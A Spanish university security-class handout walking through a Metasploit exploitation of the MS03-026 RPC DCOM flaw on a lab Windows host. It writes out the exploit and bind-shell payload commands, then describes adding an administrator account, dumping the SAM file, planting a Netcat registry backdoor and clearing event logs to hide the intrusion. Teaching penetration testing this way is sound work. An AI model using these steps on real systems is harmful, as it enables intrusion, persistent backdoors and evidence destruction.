Clase de Metasploit

14
[1] SEGURIDAD INFORMATICA - EPIS - UNPRG ING. ROBERT E. PUICAN GUTIERREZ PROCEDIMIENTO: 1. Identificación de vulnerabilidades para explotación o Con la IP 192.168.3.38 (Equipo de Windows 2000) 2. Id de vulnerabilidades del sistema 3. Buscar el exploit para explotar vulnerabilidades (Metasploit) 4. Explotar vulnerabilidades (abrir un shell y crear una cuenta de usuario) 1. Se ocupó la siguiente exploit que explota la vulnerabilidad de Desbordamiento de Interface Microsoft RPC DCOM Este módulo explota un stack buffer overflow en el servicio de RPCSS, esta vulnerabilidad es originalmente encontrada por el últimos estado de etapa del grupo de investigación “Delirium” y ha sido ampliamente explotado desde entonces. En este módulo se pueden aprovechar las versiones en Inglés de Windows NT 4.0 Service Pack 3-6a, Windows 2000, Windows XP y Windows 2003 en un solo pedido. Objetivos Windows NT SP3-6a/2000/XP/2003 universal (por defecto) Información de uso Desbordamiento de búfer en interfaz de una cierta DCOM RPC de Microsoft para Windows NT 4.0, 2000, XP y Server 2003 permite a atacantes remotos ejecutar código arbitrario mediante un mensaje con formato incorrecto, tan explotado por el Blaster / Msblast / LovSan y Nachi / Welchia gusanos Primer Paso: Iniciar el Metasploit Framework De acuerdo con las Políticas de Servicios de Redes de Kali Linux, no hay servicios de red, así como servicios de base de datos en el arranque, por lo que hay un par de pasos que deben tomarse en cuenta para la ejecución Metasploit y el soporte a la base de datos.

description

Seguridad

Transcript of Clase de Metasploit

  • [1]

    SEGURIDAD INFORMATICA - EPIS - UNPRG ING. ROBERT E. PUICAN GUTIERREZ

    PROCEDIMIENTO:

    1. Identificacin de vulnerabilidades para explotacin

    o Con la IP 192.168.3.38 (Equipo de Windows 2000)

    2. Id de vulnerabilidades del sistema

    3. Buscar el exploit para explotar vulnerabilidades (Metasploit)

    4. Explotar vulnerabilidades (abrir un shell y crear una cuenta de usuario)

    1. Se ocup la siguiente exploit que explota la vulnerabilidad de Desbordamiento de

    Interface Microsoft RPC DCOM

    Este mdulo explota un stack buffer overflow en el servicio de RPCSS, esta vulnerabilidad

    es originalmente encontrada por el ltimos estado de etapa del grupo de investigacin

    Delirium y ha sido ampliamente explotado desde entonces. En este mdulo se pueden

    aprovechar las versiones en Ingls de Windows NT 4.0 Service Pack 3-6a, Windows 2000,

    Windows XP y Windows 2003 en un solo pedido.

    Objetivos

    Windows NT SP3-6a/2000/XP/2003 universal (por defecto)

    Informacin de uso

    Desbordamiento de bfer en interfaz de una cierta DCOM RPC de Microsoft para Windows NT

    4.0, 2000, XP y Server 2003 permite a atacantes remotos ejecutar cdigo arbitrario mediante

    un mensaje con formato incorrecto, tan explotado por el Blaster / Msblast / LovSan y Nachi /

    Welchia gusanos

    Primer Paso:

    Iniciar el Metasploit Framework

    De acuerdo con las Polticas de Servicios de Redes de Kali Linux, no hay servicios de red, as

    como servicios de base de datos en el arranque, por lo que hay un par de pasos que deben

    tomarse en cuenta para la ejecucin Metasploit y el soporte a la base de datos.

  • [2]

    SEGURIDAD INFORMATICA - EPIS - UNPRG ING. ROBERT E. PUICAN GUTIERREZ

    Inicie el servicio de PostgreSQL de Kali Linux

    Metasploit usa PostgreSQL como su base de datos por lo que necesita ser iniciado

    previamente.

    service postgresql start

    Inicie el servicio de Metasploit en Kali Linux

    Con PostgreSQL en marcha, el prximo paso es ejecutar el servicio Metasploit. La primera vez

    que se ejecute el servicio, se crear un usuario de base de datos msf3 y una base de datos

    llamada msf3. El servicio tambin ejecutar los servidores RPC y web requeridos.

    service metasploit start

    Inicie msfconsole en Kali

    Una vez iniciado los servicios de PostgreSQL y Metasploit, puede iniciar msfconsole y verificar

    la conectividad de la base de datos con el siguiente comando: db_status

    msfconsole

  • [3]

    SEGURIDAD INFORMATICA - EPIS - UNPRG ING. ROBERT E. PUICAN GUTIERREZ

    msf > db_status

    [*] postgresql connected to msf3

    msf >

    Configure Metasploit para ejecutar al inicio

    Si usted prefiere que PostgreSQL y Metasploit se ejecuten al inicio, puede usar update-rc.d

    para habilitar los servicios como se muestra a continuacin:

    update-rc.d postgresql enable

    update-rc.d metasploit enable

    Primer Paso

    Desde el Kali Linux

    En la consola de Metasploit ejecute el comando, para buscar un exploit:

    search ms03_026

  • [4]

    SEGURIDAD INFORMATICA - EPIS - UNPRG ING. ROBERT E. PUICAN GUTIERREZ

    Luego para usar el exploit ejecute:

    use exploit/windows/dcerpc/ms03_026_dcom

    Para mostrar las opciones que tiene este exploit podemos usar

    show options

  • [5]

    SEGURIDAD INFORMATICA - EPIS - UNPRG ING. ROBERT E. PUICAN GUTIERREZ

    Configuramos el parmetro de RHOST, que es la direccin del host remoto (Windows)

    set RHOST 192.168.1.38

    Para mostrar los payloads disponible para este exploit:

    show payloads

  • [6]

    SEGURIDAD INFORMATICA - EPIS - UNPRG ING. ROBERT E. PUICAN GUTIERREZ

    Configuramos el payload a ejecutar, en nuestro caso deseamos obtener una Shell remota.

    set PAYLOAD generic/shell_bind_tcp

    En el caso de que hubieran ms de un posible objetivo podemos verificar con:

    show targets

    Podemos configurar con:

    set target 0

  • [7]

    SEGURIDAD INFORMATICA - EPIS - UNPRG ING. ROBERT E. PUICAN GUTIERREZ

    Finalmente ejecutamos el exploit

    exploit

    Dentro del sistema ejecute comandos bsicos de msdos:

    Visualizamos los usuarios con que cuenta el sistema:

  • [8]

    SEGURIDAD INFORMATICA - EPIS - UNPRG ING. ROBERT E. PUICAN GUTIERREZ

    Posteriormente ejecute el siguiente comando para crear un usuario y contrasea dentro del

    equipo.

    Verificar usuarios administradores

    Elevar los privilegios del usuario creado (adrian)

  • [9]

    SEGURIDAD INFORMATICA - EPIS - UNPRG ING. ROBERT E. PUICAN GUTIERREZ

    Run getgui u -p

    USANDO METERPRETER

  • [10]

    SEGURIDAD INFORMATICA - EPIS - UNPRG ING. ROBERT E. PUICAN GUTIERREZ

    Metasploit & Metepreter (Diversion garantizada) Metasploit es un framework que nos proporciona mltiples exploit y herramientas que nos

    permiten identificar vulnerabilidades en una prueba de penetracin de sistemas.

    Recuerdo cuando no existia este framework y tenias que descargar cada exploit , modificarlo y

    compilarlo por lo general todos estaban escritos C, como olvidar el exploit de tarasco que

    explotaba una vulnerabilidad conocida en los sistemas Windows "RPC DCOM" mi primera shell

    reversa con windows XP fue amor a primera vista .

    Comenzamos determinando el S.O , los servicios y versiones de software con el que cuenta

    nuestro objetivo (Target).

    Determinamos que nuestro objetivo es un w2k3 sin parche alguno , ejecutamos

    metasploit buscamo el exploit para nuestro w2k3 , configuramos el ms03_026_dcom , en

    nuestro caso vamos a utilizar como payload a meterpreter y una shell reversa por si hay algn

    firewall "protegiendo" el S.O

  • [11]

    SEGURIDAD INFORMATICA - EPIS - UNPRG ING. ROBERT E. PUICAN GUTIERREZ

    En la imagen podemos observar que metepreter creo una sesin de forma exitosa, ahora

    podemos hacer lo que nuestra imaginacin nos permita , el comando sysinfo permite obtener

    datos del S.O.

    Con el comando Shell nos devuelve una "shell" del S.O , con la cual podemos utilizar los

    comandos nativos de Windows , como por ejemplo listar la configuracin de las IP

  • [12]

    SEGURIDAD INFORMATICA - EPIS - UNPRG ING. ROBERT E. PUICAN GUTIERREZ

    Listamos los procesos del sistema operativo con el comando Tasklist

    Para volver a la sesin de meterpreter solo escribimos exit, con el comando screenshot

    capturamos la pantalla actual del servidor

  • [13]

    SEGURIDAD INFORMATICA - EPIS - UNPRG ING. ROBERT E. PUICAN GUTIERREZ

    Metepreter nos permite hacer un dump al archivo SAM de windows , para posteriormente

    crackear, con el comando upload subimos un Netcat al equipo y modificamos el editor de

    registros de windows para crear una BindShell.

    Modificamos "regedit"

    Ya tenemos una puerta trasera escuchando en un puerto en este caso el 666 jajaaj,

    meterpreter permite aplicar tcnicas "anti forenses" como el de limpiar el registro de eventos

    de windows para no "dejar" huellas con el comando clearev.

  • [14]

    SEGURIDAD INFORMATICA - EPIS - UNPRG ING. ROBERT E. PUICAN GUTIERREZ

    Mientras menos rastros se pueda dejar en una intrusin mejor , el nivel de experiencia de un

    buen pentester es proporcional a las huellas que pueda dejar en una intrusin.